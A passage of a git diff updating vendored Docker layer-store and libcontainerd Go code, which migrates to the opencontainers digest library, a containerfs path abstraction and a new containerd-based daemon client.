(io.ReadCloser, error) { + if !ls.useTarSplit { + var parentCacheID string + if rl.parent != nil { + parentCacheID = rl.parent.cacheID + } + + return ls.driver.Diff(rl.cacheID, parentCacheID) + } + + r, err := ls.store.TarSplitReader(rl.chainID) + if err != nil { + return nil, err + } + + pr, pw := io.Pipe() + go func() { + err := ls.assembleTarTo(rl.cacheID, r, nil, pw) + if err != nil { + pw.CloseWithError(err) + } else { + pw.Close() + } + }() + + return pr, nil +} + func (ls *layerStore) assembleTarTo(graphID string, metadata io.ReadCloser, size *int64, w io.Writer) error { diffDriver, ok := ls.driver.(graphdriver.DiffGetterDriver) if !ok { @@ -680,5 +750,5 @@ func (n *naiveDiffPathDriver) DiffGetter(id string) (graphdriver.FileGetCloser, if err != nil { return nil, err } - return &fileGetPutter{storage.NewPathFileGetter(p), n.Driver, id}, nil + return &fileGetPutter{storage.NewPathFileGetter(p.Path()), n.Driver, id}, nil } diff --git a/vendor/github.com/docker/docker/layer/layer_store_windows.go b/vendor/github.com/docker/docker/layer/layer_store_windows.go index 1276a912cc..eca1f6a83b 100644 --- a/vendor/github.com/docker/docker/layer/layer_store_windows.go +++ b/vendor/github.com/docker/docker/layer/layer_store_windows.go @@ -1,4 +1,4 @@ -package layer +package layer // import "github.com/docker/docker/layer" import ( "io" diff --git a/vendor/github.com/docker/docker/layer/layer_test.go b/vendor/github.com/docker/docker/layer/layer_test.go index 10712df998..5c4e8fab19 100644 --- a/vendor/github.com/docker/docker/layer/layer_test.go +++ b/vendor/github.com/docker/docker/layer/layer_test.go @@ -1,4 +1,4 @@ -package layer +package layer // import "github.com/docker/docker/layer" import ( "bytes" @@ -10,17 +10,20 @@ import ( "strings" "testing" - "github.com/docker/distribution/digest" + "github.com/containerd/continuity/driver" "github.com/docker/docker/daemon/graphdriver" "github.com/docker/docker/daemon/graphdriver/vfs" "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/containerfs" "github.com/docker/docker/pkg/idtools" "github.com/docker/docker/pkg/stringid" + "github.com/opencontainers/go-digest" ) func init() { graphdriver.ApplyUncompressedLayer = archive.UnpackLayer - vfs.CopyWithTar = archive.CopyWithTar + defaultArchiver := archive.NewDefaultArchiver() + vfs.CopyDir = defaultArchiver.CopyWithTar } func newVFSGraphDriver(td string) (graphdriver.Driver, error) { @@ -66,11 +69,8 @@ func newTestStore(t *testing.T) (Store, string, func()) { } graph, graphcleanup := newTestGraphDriver(t) - fms, err := NewFSMetadataStore(td) - if err != nil { - t.Fatal(err) - } - ls, err := NewStoreFromGraphDriver(fms, graph) + + ls, err := newStoreFromGraphDriver(td, graph, runtime.GOOS) if err != nil { t.Fatal(err) } @@ -81,21 +81,21 @@ func newTestStore(t *testing.T) (Store, string, func()) { } } -type layerInit func(root string) error +type layerInit func(root containerfs.ContainerFS) error func createLayer(ls Store, parent ChainID, layerFunc layerInit) (Layer, error) { containerID := stringid.GenerateRandomID() - mount, err := ls.CreateRWLayer(containerID, parent, "", nil, nil) + mount, err := ls.CreateRWLayer(containerID, parent, nil) if err != nil { return nil, err } - path, err := mount.Mount("") + pathFS, err := mount.Mount("") if err != nil { return nil, err } - if err := layerFunc(path); err != nil { + if err := layerFunc(pathFS); err != nil { return nil, err } @@ -122,7 +122,7 @@ func createLayer(ls Store, parent ChainID, layerFunc layerInit) (Layer, error) { } type FileApplier interface { - ApplyFile(root string) error + ApplyFile(root containerfs.ContainerFS) error } type testFile struct { @@ -139,25 +139,22 @@ func newTestFile(name string, content []byte, perm os.FileMode) FileApplier { } } -func (tf *testFile) ApplyFile(root string) error { - fullPath := filepath.Join(root, tf.name) - if err := os.MkdirAll(filepath.Dir(fullPath), 0755); err != nil { +func (tf *testFile) ApplyFile(root containerfs.ContainerFS) error { + fullPath := root.Join(root.Path(), tf.name) + if err := root.MkdirAll(root.Dir(fullPath), 0755); err != nil { return err } // Check if already exists - if stat, err := os.Stat(fullPath); err == nil && stat.Mode().Perm() != tf.permission { - if err := os.Chmod(fullPath, tf.permission); err != nil { + if stat, err := root.Stat(fullPath); err == nil && stat.Mode().Perm() != tf.permission { + if err := root.Lchmod(fullPath, tf.permission); err != nil { return err } } - if err := ioutil.WriteFile(fullPath, tf.content, tf.permission); err != nil { - return err - } - return nil + return driver.WriteFile(root, fullPath, tf.content, tf.permission) } func initWithFiles(files ...FileApplier) layerInit { - return func(root string) error { + return func(root containerfs.ContainerFS) error { for _, f := range files { if err := f.ApplyFile(root); err != nil { return err @@ -231,7 +228,7 @@ func cacheID(l Layer) string { func assertLayerEqual(t *testing.T, l1, l2 Layer) { if l1.ChainID() != l2.ChainID() { - t.Fatalf("Mismatched ID: %s vs %s", l1.ChainID(), l2.ChainID()) + t.Fatalf("Mismatched ChainID: %s vs %s", l1.ChainID(), l2.ChainID()) } if l1.DiffID() != l2.DiffID() { t.Fatalf("Mismatched DiffID: %s vs %s", l1.DiffID(), l2.DiffID()) @@ -277,7 +274,7 @@ func TestMountAndRegister(t *testing.T) { size, _ := layer.Size() t.Logf("Layer size: %d", size) - mount2, err := ls.CreateRWLayer("new-test-mount", layer.ChainID(), "", nil, nil) + mount2, err := ls.CreateRWLayer("new-test-mount", layer.ChainID(), nil) if err != nil { t.Fatal(err) } @@ -287,7 +284,7 @@ func TestMountAndRegister(t *testing.T) { t.Fatal(err) } - b, err := ioutil.ReadFile(filepath.Join(path2, "testfile.txt")) + b, err := driver.ReadFile(path2, path2.Join(path2.Path(), "testfile.txt")) if err != nil { t.Fatal(err) } @@ -385,17 +382,17 @@ func TestStoreRestore(t *testing.T) { t.Fatal(err) } - m, err := ls.CreateRWLayer("some-mount_name", layer3.ChainID(), "", nil, nil) + m, err := ls.CreateRWLayer("some-mount_name", layer3.ChainID(), nil) if err != nil { t.Fatal(err) } - path, err := m.Mount("") + pathFS, err := m.Mount("") if err != nil { t.Fatal(err) } - if err := ioutil.WriteFile(filepath.Join(path, "testfile.txt"), []byte("nothing here"), 0644); err != nil { + if err := driver.WriteFile(pathFS, pathFS.Join(pathFS.Path(), "testfile.txt"), []byte("nothing here"), 0644); err != nil { t.Fatal(err) } @@ -403,7 +400,7 @@ func TestStoreRestore(t *testing.T) { t.Fatal(err) } - ls2, err := NewStoreFromGraphDriver(ls.(*layerStore).store, ls.(*layerStore).driver) + ls2, err := newStoreFromGraphDriver(ls.(*layerStore).store.root, ls.(*layerStore).driver, runtime.GOOS) if err != nil { t.Fatal(err) } @@ -416,7 +413,7 @@ func TestStoreRestore(t *testing.T) { assertLayerEqual(t, layer3b, layer3) // Create again with same name, should return error - if _, err := ls2.CreateRWLayer("some-mount_name", layer3b.ChainID(), "", nil, nil); err == nil { + if _, err := ls2.CreateRWLayer("some-mount_name", layer3b.ChainID(), nil); err == nil { t.Fatal("Expected error creating mount with same name") } else if err != ErrMountNameConflict { t.Fatal(err) @@ -429,20 +426,20 @@ func TestStoreRestore(t *testing.T) { if mountPath, err := m2.Mount(""); err != nil { t.Fatal(err) - } else if path != mountPath { - t.Fatalf("Unexpected path %s, expected %s", mountPath, path) + } else if pathFS.Path() != mountPath.Path() { + t.Fatalf("Unexpected path %s, expected %s", mountPath.Path(), pathFS.Path()) } if mountPath, err := m2.Mount(""); err != nil { t.Fatal(err) - } else if path != mountPath { - t.Fatalf("Unexpected path %s, expected %s", mountPath, path) + } else if pathFS.Path() != mountPath.Path() { + t.Fatalf("Unexpected path %s, expected %s", mountPath.Path(), pathFS.Path()) } if err := m2.Unmount(); err != nil { t.Fatal(err) } - b, err := ioutil.ReadFile(filepath.Join(path, "testfile.txt")) + b, err := driver.ReadFile(pathFS, pathFS.Join(pathFS.Path(), "testfile.txt")) if err != nil { t.Fatal(err) } @@ -617,7 +614,7 @@ func tarFromFiles(files ...FileApplier) ([]byte, error) { defer os.RemoveAll(td) for _, f := range files { - if err := f.ApplyFile(td); err != nil { + if err := f.ApplyFile(containerfs.NewLocalContainerFS(td)); err != nil { return nil, err } } diff --git a/vendor/github.com/docker/docker/layer/layer_unix.go b/vendor/github.com/docker/docker/layer/layer_unix.go index 776b78ac02..002c7ff838 100644 --- a/vendor/github.com/docker/docker/layer/layer_unix.go +++ b/vendor/github.com/docker/docker/layer/layer_unix.go @@ -1,6 +1,6 @@ -// +build linux freebsd darwin openbsd solaris +// +build linux freebsd darwin openbsd -package layer +package layer // import "github.com/docker/docker/layer" import "github.com/docker/docker/pkg/stringid" diff --git a/vendor/github.com/docker/docker/layer/layer_unix_test.go b/vendor/github.com/docker/docker/layer/layer_unix_test.go index 9aa1afd597..6830158131 100644 --- a/vendor/github.com/docker/docker/layer/layer_unix_test.go +++ b/vendor/github.com/docker/docker/layer/layer_unix_test.go @@ -1,8 +1,10 @@ // +build !windows -package layer +package layer // import "github.com/docker/docker/layer" -import "testing" +import ( + "testing" +) func graphDiffSize(ls Store, l Layer) (int64, error) { cl := getCachedLayer(l) diff --git a/vendor/github.com/docker/docker/layer/layer_windows.go b/vendor/github.com/docker/docker/layer/layer_windows.go index e20311a091..25ef26afc1 100644 --- a/vendor/github.com/docker/docker/layer/layer_windows.go +++ b/vendor/github.com/docker/docker/layer/layer_windows.go @@ -1,14 +1,16 @@ -package layer +package layer // import "github.com/docker/docker/layer" import ( "errors" - "fmt" - - "github.com/Sirupsen/logrus" - "github.com/docker/distribution/digest" - "github.com/docker/docker/daemon/graphdriver" ) +// Getter is an interface to get the path to a layer on the host. +type Getter interface { + // GetLayerPath gets the path for the layer. This is different from Get() + // since that returns an interface to account for umountable layers. + GetLayerPath(id string) (string, error) +} + // GetLayerPath returns the path to a layer func GetLayerPath(s Store, layer ChainID) (string, error) { ls, ok := s.(*layerStore) @@ -23,6 +25,9 @@ func GetLayerPath(s Store, layer ChainID) (string, error) { return "", ErrLayerDoesNotExist } + if layerGetter, ok := ls.driver.(Getter); ok { + return layerGetter.GetLayerPath(rl.cacheID) + } path, err := ls.driver.Get(rl.cacheID, "") if err != nil { return "", err @@ -32,67 +37,10 @@ func GetLayerPath(s Store, layer ChainID) (string, error) { return "", err } - return path, nil -} - -func (ls *layerStore) RegisterDiffID(graphID string, size int64) (Layer, error) { - var err error // this is used for cleanup in existingLayer case - diffID := digest.FromBytes([]byte(graphID)) - - // Create new roLayer - layer := &roLayer{ - cacheID: graphID, - diffID: DiffID(diffID), - referenceCount: 1, - layerStore: ls, - references: map[Layer]struct{}{}, - size: size, - } - - tx, err := ls.store.StartTransaction() - if err != nil { - return nil, err - } - defer func() { - if err != nil { - if err := tx.Cancel(); err != nil { - logrus.Errorf("Error canceling metadata transaction %q: %s", tx.String(), err) - } - } - }() - - layer.chainID = createChainIDFromParent("", layer.diffID) - - if !ls.driver.Exists(layer.cacheID) { - return nil, fmt.Errorf("layer %q is unknown to driver", layer.cacheID) - } - if err = storeLayer(tx, layer); err != nil { - return nil, err - } - - ls.layerL.Lock() - defer ls.layerL.Unlock() - - if existingLayer := ls.getWithoutLock(layer.chainID); existingLayer != nil { - // Set error for cleanup, but do not return - err = errors.New("layer already exists") - return existingLayer.getReference(), nil - } - - if err = tx.Commit(layer.chainID); err != nil { - return nil, err - } - - ls.layerMap[layer.chainID] = layer - - return layer.getReference(), nil + return path.Path(), nil } func (ls *layerStore) mountID(name string) string { // windows has issues if container ID doesn't match mount ID return name } - -func (ls *layerStore) GraphDriver() graphdriver.Driver { - return ls.driver -} diff --git a/vendor/github.com/docker/docker/layer/migration.go b/vendor/github.com/docker/docker/layer/migration.go index b45c31099d..2668ea96bb 100644 --- a/vendor/github.com/docker/docker/layer/migration.go +++ b/vendor/github.com/docker/docker/layer/migration.go @@ -1,4 +1,4 @@ -package layer +package layer // import "github.com/docker/docker/layer" import ( "compress/gzip" @@ -7,8 +7,8 @@ import ( "io" "os" - "github.com/Sirupsen/logrus" - "github.com/docker/distribution/digest" + "github.com/opencontainers/go-digest" + "github.com/sirupsen/logrus" "github.com/vbatts/tar-split/tar/asm" "github.com/vbatts/tar-split/tar/storage" ) @@ -16,7 +16,7 @@ import ( // CreateRWLayerByGraphID creates a RWLayer in the layer store using // the provided name with the given graphID. To get the RWLayer // after migration the layer may be retrieved by the given name. -func (ls *layerStore) CreateRWLayerByGraphID(name string, graphID string, parent ChainID) (err error) { +func (ls *layerStore) CreateRWLayerByGraphID(name, graphID string, parent ChainID) (err error) { ls.mountL.Lock() defer ls.mountL.Unlock() m, ok := ls.mounts[name] @@ -68,11 +68,7 @@ func (ls *layerStore) CreateRWLayerByGraphID(name string, graphID string, parent m.initID = initID } - if err = ls.saveMount(m); err != nil { - return err - } - - return nil + return ls.saveMount(m) } func (ls *layerStore) ChecksumForGraphID(id, parent, oldTarDataPath, newTarDataPath string) (diffID DiffID, size int64, err error) { @@ -98,7 +94,7 @@ func (ls *layerStore) ChecksumForGraphID(id, parent, oldTarDataPath, newTarDataP return } - dgst := digest.Canonical.New() + dgst := digest.Canonical.Digester() err = ls.assembleTarTo(id, uncompressed, &size, dgst.Hash()) if err != nil { return diff --git a/vendor/github.com/docker/docker/layer/migration_test.go b/vendor/github.com/docker/docker/layer/migration_test.go index 07b4b68f8f..923166371c 100644 --- a/vendor/github.com/docker/docker/layer/migration_test.go +++ b/vendor/github.com/docker/docker/layer/migration_test.go @@ -1,4 +1,4 @@ -package layer +package layer // import "github.com/docker/docker/layer" import ( "bytes" @@ -90,11 +90,8 @@ func TestLayerMigration(t *testing.T) { t.Fatal(err) } - fms, err := NewFSMetadataStore(filepath.Join(td, "layers")) - if err != nil { - t.Fatal(err) - } - ls, err := NewStoreFromGraphDriver(fms, graph) + root := filepath.Join(td, "layers") + ls, err := newStoreFromGraphDriver(root, graph, runtime.GOOS) if err != nil { t.Fatal(err) } @@ -218,11 +215,8 @@ func TestLayerMigrationNoTarsplit(t *testing.T) { t.Fatal(err) } - fms, err := NewFSMetadataStore(filepath.Join(td, "layers")) - if err != nil { - t.Fatal(err) - } - ls, err := NewStoreFromGraphDriver(fms, graph) + root := filepath.Join(td, "layers") + ls, err := newStoreFromGraphDriver(root, graph, runtime.GOOS) if err != nil { t.Fatal(err) } @@ -380,7 +374,7 @@ func TestMountMigration(t *testing.T) { Kind: archive.ChangeAdd, }) - if _, err := ls.CreateRWLayer("migration-mount", layer1.ChainID(), "", nil, nil); err == nil { + if _, err := ls.CreateRWLayer("migration-mount", layer1.ChainID(), nil); err == nil { t.Fatal("Expected error creating mount with same name") } else if err != ErrMountNameConflict { t.Fatal(err) diff --git a/vendor/github.com/docker/docker/layer/mount_test.go b/vendor/github.com/docker/docker/layer/mount_test.go index 7a8637eae9..1cfc370eed 100644 --- a/vendor/github.com/docker/docker/layer/mount_test.go +++ b/vendor/github.com/docker/docker/layer/mount_test.go @@ -1,14 +1,14 @@ -package layer +package layer // import "github.com/docker/docker/layer" import ( "io/ioutil" - "os" - "path/filepath" "runtime" "sort" "testing" + "github.com/containerd/continuity/driver" "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/containerfs" ) func TestMountInit(t *testing.T) { @@ -28,30 +28,33 @@ func TestMountInit(t *testing.T) { t.Fatal(err) } - mountInit := func(root string) error { + mountInit := func(root containerfs.ContainerFS) error { return initfile.ApplyFile(root) } - m, err := ls.CreateRWLayer("fun-mount", layer.ChainID(), "", mountInit, nil) + rwLayerOpts := &CreateRWLayerOpts{ + InitFunc: mountInit, + } + m, err := ls.CreateRWLayer("fun-mount", layer.ChainID(), rwLayerOpts) if err != nil { t.Fatal(err) } - path, err := m.Mount("") + pathFS, err := m.Mount("") if err != nil { t.Fatal(err) } - f, err := os.Open(filepath.Join(path, "testfile.txt")) + fi, err := pathFS.Stat(pathFS.Join(pathFS.Path(), "testfile.txt")) if err != nil { t.Fatal(err) } - defer f.Close() - fi, err := f.Stat() + f, err := pathFS.Open(pathFS.Join(pathFS.Path(), "testfile.txt")) if err != nil { t.Fatal(err) } + defer f.Close() b, err := ioutil.ReadAll(f) if err != nil { @@ -85,21 +88,24 @@ func TestMountSize(t *testing.T) { t.Fatal(err) } - mountInit := func(root string) error { + mountInit := func(root containerfs.ContainerFS) error { return newTestFile("file-init", contentInit, 0777).ApplyFile(root) } + rwLayerOpts := &CreateRWLayerOpts{ + InitFunc: mountInit, + } - m, err := ls.CreateRWLayer("mount-size", layer.ChainID(), "", mountInit, nil) + m, err := ls.CreateRWLayer("mount-size", layer.ChainID(), rwLayerOpts) if err != nil { t.Fatal(err) } - path, err := m.Mount("") + pathFS, err := m.Mount("") if err != nil { t.Fatal(err) } - if err := ioutil.WriteFile(filepath.Join(path, "file2"), content2, 0755); err != nil { + if err := driver.WriteFile(pathFS, pathFS.Join(pathFS.Path(), "file2"), content2, 0755); err != nil { t.Fatal(err) } @@ -134,37 +140,40 @@ func TestMountChanges(t *testing.T) { t.Fatal(err) } - mountInit := func(root string) error { + mountInit := func(root containerfs.ContainerFS) error { return initfile.ApplyFile(root) } + rwLayerOpts := &CreateRWLayerOpts{ + InitFunc: mountInit, + } - m, err := ls.CreateRWLayer("mount-changes", layer.ChainID(), "", mountInit, nil) + m, err := ls.CreateRWLayer("mount-changes", layer.ChainID(), rwLayerOpts) if err != nil { t.Fatal(err) } - path, err := m.Mount("") + pathFS, err := m.Mount("") if err != nil { t.Fatal(err) } - if err := os.Chmod(filepath.Join(path, "testfile1.txt"), 0755); err != nil { + if err := pathFS.Lchmod(pathFS.Join(pathFS.Path(), "testfile1.txt"), 0755); err != nil { t.Fatal(err) } - if err := ioutil.WriteFile(filepath.Join(path, "testfile1.txt"), []byte("mount data!"), 0755); err != nil { + if err := driver.WriteFile(pathFS, pathFS.Join(pathFS.Path(), "testfile1.txt"), []byte("mount data!"), 0755); err != nil { t.Fatal(err) } - if err := os.Remove(filepath.Join(path, "testfile2.txt")); err != nil { + if err := pathFS.Remove(pathFS.Join(pathFS.Path(), "testfile2.txt")); err != nil { t.Fatal(err) } - if err := os.Chmod(filepath.Join(path, "testfile3.txt"), 0755); err != nil { + if err := pathFS.Lchmod(pathFS.Join(pathFS.Path(), "testfile3.txt"), 0755); err != nil { t.Fatal(err) } - if err := ioutil.WriteFile(filepath.Join(path, "testfile4.txt"), []byte("mount data!"), 0644); err != nil { + if err := driver.WriteFile(pathFS, pathFS.Join(pathFS.Path(), "testfile4.txt"), []byte("mount data!"), 0644); err != nil { t.Fatal(err) } diff --git a/vendor/github.com/docker/docker/layer/mounted_layer.go b/vendor/github.com/docker/docker/layer/mounted_layer.go index a5cfcfa9bd..d6858c662c 100644 --- a/vendor/github.com/docker/docker/layer/mounted_layer.go +++ b/vendor/github.com/docker/docker/layer/mounted_layer.go @@ -1,9 +1,10 @@ -package layer +package layer // import "github.com/docker/docker/layer" import ( "io" "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/containerfs" ) type mountedLayer struct { @@ -88,7 +89,7 @@ type referencedRWLayer struct { *mountedLayer } -func (rl *referencedRWLayer) Mount(mountLabel string) (string, error) { +func (rl *referencedRWLayer) Mount(mountLabel string) (containerfs.ContainerFS, error) { return rl.layerStore.driver.Get(rl.mountedLayer.mountID, mountLabel) } diff --git a/vendor/github.com/docker/docker/layer/ro_layer.go b/vendor/github.com/docker/docker/layer/ro_layer.go index 7c8d233a35..3555e8b027 100644 --- a/vendor/github.com/docker/docker/layer/ro_layer.go +++ b/vendor/github.com/docker/docker/layer/ro_layer.go @@ -1,11 +1,11 @@ -package layer +package layer // import "github.com/docker/docker/layer" import ( "fmt" "io" "github.com/docker/distribution" - "github.com/docker/distribution/digest" + "github.com/opencontainers/go-digest" ) type roLayer struct { @@ -21,31 +21,22 @@ type roLayer struct { references map[Layer]struct{} } -// TarStream for roLayer guarentees that the data that is produced is the exact +// TarStream for roLayer guarantees that the data that is produced is the exact // data that the layer was registered with. func (rl *roLayer) TarStream() (io.ReadCloser, error) { - r, err := rl.layerStore.store.TarSplitReader(rl.chainID) + rc, err := rl.layerStore.getTarStream(rl) if err != nil { return nil, err } - pr, pw := io.Pipe() - go func() { - err := rl.layerStore.assembleTarTo(rl.cacheID, r, nil, pw) - if err != nil { - pw.CloseWithError(err) - } else { - pw.Close() - } - }() - rc, err := newVerifiedReadCloser(pr, digest.Digest(rl.diffID)) + vrc, err := newVerifiedReadCloser(rc, digest.Digest(rl.diffID)) if err != nil { return nil, err } - return rc, nil + return vrc, nil } -// TarStreamFrom does not make any guarentees to the correctness of the produced +// TarStreamFrom does not make any guarantees to the correctness of the produced // data. As such it should not be used when the layer content must be verified // to be an exact match to the registered layer. func (rl *roLayer) TarStreamFrom(parent ChainID) (io.ReadCloser, error) { @@ -63,6 +54,10 @@ func (rl *roLayer) TarStreamFrom(parent ChainID) (io.ReadCloser, error) { return rl.layerStore.driver.Diff(rl.cacheID, parentCacheID) } +func (rl *roLayer) CacheID() string { + return rl.cacheID +} + func (rl *roLayer) ChainID() ChainID { return rl.chainID } @@ -130,7 +125,7 @@ func (rl *roLayer) depth() int { return rl.parent.depth() + 1 } -func storeLayer(tx MetadataTransaction, layer *roLayer) error { +func storeLayer(tx *fileMetadataTransaction, layer *roLayer) error { if err := tx.SetDiffID(layer.diffID); err != nil { return err } @@ -151,19 +146,14 @@ func storeLayer(tx MetadataTransaction, layer *roLayer) error { return err } } - - return nil + return tx.setOS(layer.layerStore.os) } func newVerifiedReadCloser(rc io.ReadCloser, dgst digest.Digest) (io.ReadCloser, error) { - verifier, err := digest.NewDigestVerifier(dgst) - if err != nil { - return nil, err - } return &verifiedReadCloser{ rc: rc, dgst: dgst, - verifier: verifier, + verifier: dgst.Verifier(), }, nil } diff --git a/vendor/github.com/docker/docker/layer/ro_layer_windows.go b/vendor/github.com/docker/docker/layer/ro_layer_windows.go index 32bd7182a3..a4f0c8088e 100644 --- a/vendor/github.com/docker/docker/layer/ro_layer_windows.go +++ b/vendor/github.com/docker/docker/layer/ro_layer_windows.go @@ -1,4 +1,4 @@ -package layer +package layer // import "github.com/docker/docker/layer" import "github.com/docker/distribution" diff --git a/vendor/github.com/docker/docker/libcontainerd/client.go b/vendor/github.com/docker/docker/libcontainerd/client.go deleted file mode 100644 index c14c1c5e46..0000000000 --- a/vendor/github.com/docker/docker/libcontainerd/client.go +++ /dev/null @@ -1,46 +0,0 @@ -package libcontainerd - -import ( - "fmt" - "sync" - - "github.com/docker/docker/pkg/locker" -) - -// clientCommon contains the platform agnostic fields used in the client structure -type clientCommon struct { - backend Backend - containers map[string]*container - locker *locker.Locker - mapMutex sync.RWMutex // protects read/write oprations from containers map -} - -func (clnt *client) lock(containerID string) { - clnt.locker.Lock(containerID) -} - -func (clnt *client) unlock(containerID string) { - clnt.locker.Unlock(containerID) -} - -// must hold a lock for cont.containerID -func (clnt *client) appendContainer(cont *container) { - clnt.mapMutex.Lock() - clnt.containers[cont.containerID] = cont - clnt.mapMutex.Unlock() -} -func (clnt *client) deleteContainer(containerID string) { - clnt.mapMutex.Lock() - delete(clnt.containers, containerID) - clnt.mapMutex.Unlock() -} - -func (clnt *client) getContainer(containerID string) (*container, error) { - clnt.mapMutex.RLock() - container, ok := clnt.containers[containerID] - defer clnt.mapMutex.RUnlock() - if !ok { - return nil, fmt.Errorf("invalid container: %s", containerID) // fixme: typed error - } - return container, nil -} diff --git a/vendor/github.com/docker/docker/libcontainerd/client_daemon.go b/vendor/github.com/docker/docker/libcontainerd/client_daemon.go new file mode 100644 index 0000000000..0706fa4daa --- /dev/null +++ b/vendor/github.com/docker/docker/libcontainerd/client_daemon.go @@ -0,0 +1,894 @@ +// +build !windows + +package libcontainerd // import "github.com/docker/docker/libcontainerd" + +import ( + "context" + "encoding/json" + "fmt" + "io" + "os" + "path/filepath" + "reflect" + "runtime" + "strings" + "sync" + "syscall" + "time" + + "github.com/containerd/containerd" + apievents "github.com/containerd/containerd/api/events" + "github.com/containerd/containerd/api/types" + "github.com/containerd/containerd/archive" + "github.com/containerd/containerd/cio" + "github.com/containerd/containerd/content" + containerderrors "github.com/containerd/containerd/errdefs" + "github.com/containerd/containerd/events" + "github.com/containerd/containerd/images" + "github.com/containerd/containerd/runtime/linux/runctypes" + "github.com/containerd/typeurl" + "github.com/docker/docker/errdefs" + "github.com/docker/docker/pkg/ioutils" + "github.com/opencontainers/image-spec/specs-go/v1" + specs "github.com/opencontainers/runtime-spec/specs-go" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" + "google.golang.org/grpc/codes" + "google.golang.org/grpc/status" +) + +// InitProcessName is the name given to the first process of a +// container +const InitProcessName = "init" + +type container struct { + mu sync.Mutex + + bundleDir string + ctr containerd.Container + task containerd.Task + execs map[string]containerd.Process + oomKilled bool +} + +func (c *container) setTask(t containerd.Task) { + c.mu.Lock() + c.task = t + c.mu.Unlock() +} + +func (c *container) getTask() containerd.Task { + c.mu.Lock() + t := c.task + c.mu.Unlock() + return t +} + +func (c *container) addProcess(id string, p containerd.Process) { + c.mu.Lock() + if c.execs == nil { + c.execs = make(map[string]containerd.Process) + } + c.execs[id] = p + c.mu.Unlock() +} + +func (c *container) deleteProcess(id string) { + c.mu.Lock() + delete(c.execs, id) + c.mu.Unlock() +} + +func (c *container) getProcess(id string) containerd.Process { + c.mu.Lock() + p := c.execs[id] + c.mu.Unlock() + return p +} + +func (c *container) setOOMKilled(killed bool) { + c.mu.Lock() + c.oomKilled = killed + c.mu.Unlock() +} + +func (c *container) getOOMKilled() bool { + c.mu.Lock() + killed := c.oomKilled + c.mu.Unlock() + return killed +} + +type client struct { + sync.RWMutex // protects containers map + + remote *containerd.Client + stateDir string + logger *logrus.Entry + + namespace string + backend Backend + eventQ queue + containers map[string]*container +} + +func (c *client) reconnect() error { + c.Lock() + err := c.remote.Reconnect() + c.Unlock() + return err +} + +func (c *client) setRemote(remote *containerd.Client) { + c.Lock() + c.remote = remote + c.Unlock() +} + +func (c *client) getRemote() *containerd.Client { + c.RLock() + remote := c.remote + c.RUnlock() + return remote +} + +func (c *client) Version(ctx context.Context) (containerd.Version, error) { + return c.getRemote().Version(ctx) +} + +// Restore loads the containerd container. +// It should not be called concurrently with any other operation for the given ID. +func (c *client) Restore(ctx context.Context, id string, attachStdio StdioCallback) (alive bool, pid int, err error) { + c.Lock() + _, ok := c.containers[id] + if ok { + c.Unlock() + return false, 0, errors.WithStack(newConflictError("id already in use")) + } + + cntr := &container{} + c.containers[id] = cntr + cntr.mu.Lock() + defer cntr.mu.Unlock() + + c.Unlock() + + defer func() { + if err != nil { + c.Lock() + delete(c.containers, id) + c.Unlock() + } + }() + + var dio *cio.DirectIO + defer func() { + if err != nil && dio != nil { + dio.Cancel() + dio.Close() + } + err = wrapError(err) + }() + + ctr, err := c.getRemote().LoadContainer(ctx, id) + if err != nil { + return false, -1, errors.WithStack(wrapError(err)) + } + + attachIO := func(fifos *cio.FIFOSet) (cio.IO, error) { + // dio must be assigned to the previously defined dio for the defer above + // to handle cleanup + dio, err = cio.NewDirectIO(ctx, fifos) + if err != nil { + return nil, err + } + return attachStdio(dio) + } + t, err := ctr.Task(ctx, attachIO) + if err != nil && !containerderrors.IsNotFound(err) { + return false, -1, errors.Wrap(wrapError(err), "error getting containerd task for container") + } + + if t != nil { + s, err := t.Status(ctx) + if err != nil { + return false, -1, errors.Wrap(wrapError(err), "error getting task status") + } + + alive = s.Status != containerd.Stopped + pid = int(t.Pid()) + } + + cntr.bundleDir = filepath.Join(c.stateDir, id) + cntr.ctr = ctr + cntr.task = t + // TODO(mlaventure): load execs + + c.logger.WithFields(logrus.Fields{ + "container": id, + "alive": alive, + "pid": pid, + }).Debug("restored container") + + return alive, pid, nil +} + +func (c *client) Create(ctx context.Context, id string, ociSpec *specs.Spec, runtimeOptions interface{}) error { + if ctr := c.getContainer(id); ctr != nil { + return errors.WithStack(newConflictError("id already in use")) + } + + bdir, err := prepareBundleDir(filepath.Join(c.stateDir, id), ociSpec) + if err != nil { + return errdefs.System(errors.Wrap(err, "prepare bundle dir failed")) + } + + c.logger.WithField("bundle", bdir).WithField("root", ociSpec.Root.Path).Debug("bundle dir created") + + cdCtr, err := c.getRemote().NewContainer(ctx, id, + containerd.WithSpec(ociSpec), + // TODO(mlaventure): when containerd support lcow, revisit runtime value + containerd.WithRuntime(fmt.Sprintf("io.containerd.runtime.v1.%s", runtime.GOOS), runtimeOptions)) + if err != nil { + return wrapError(err) + } + + c.Lock() + c.containers[id] = &container{ + bundleDir: bdir, + ctr: cdCtr, + } + c.Unlock() + + return nil +} + +// Start create and start a task for the specified containerd id +func (c *client) Start(ctx context.Context, id, checkpointDir string, withStdin bool, attachStdio StdioCallback) (int, error) { + ctr := c.getContainer(id) + if ctr == nil { + return -1, errors.WithStack(newNotFoundError("no such container")) + } + if t := ctr.getTask(); t != nil { + return -1, errors.WithStack(newConflictError("container already started")) + } + + var ( + cp *types.Descriptor + t containerd.Task + rio cio.IO + err error + stdinCloseSync = make(chan struct{}) + ) + + if checkpointDir != "" { + // write checkpoint to the content store + tar := archive.Diff(ctx, "", checkpointDir) + cp, err = c.writeContent(ctx, images.MediaTypeContainerd1Checkpoint, checkpointDir, tar) + // remove the checkpoint when we're done + defer func() { + if cp != nil { + err := c.getRemote().ContentStore().Delete(context.Background(), cp.Digest) + if err != nil { + c.logger.WithError(err).WithFields(logrus.Fields{ + "ref": checkpointDir, + "digest": cp.Digest, + }).Warnf("failed to delete temporary checkpoint entry") + } + } + }() + if err := tar.Close(); err != nil { + return -1, errors.Wrap(err, "failed to close checkpoint tar stream") + } + if err != nil { + return -1, errors.Wrapf(err, "failed to upload checkpoint to containerd") + } + } + + spec, err := ctr.ctr.Spec(ctx) + if err != nil { + return -1, errors.Wrap(err, "failed to retrieve spec") + } + uid, gid := getSpecUser(spec) + t, err = ctr.ctr.NewTask(ctx, + func(id string) (cio.IO, error) { + fifos := newFIFOSet(ctr.bundleDir, InitProcessName, withStdin, 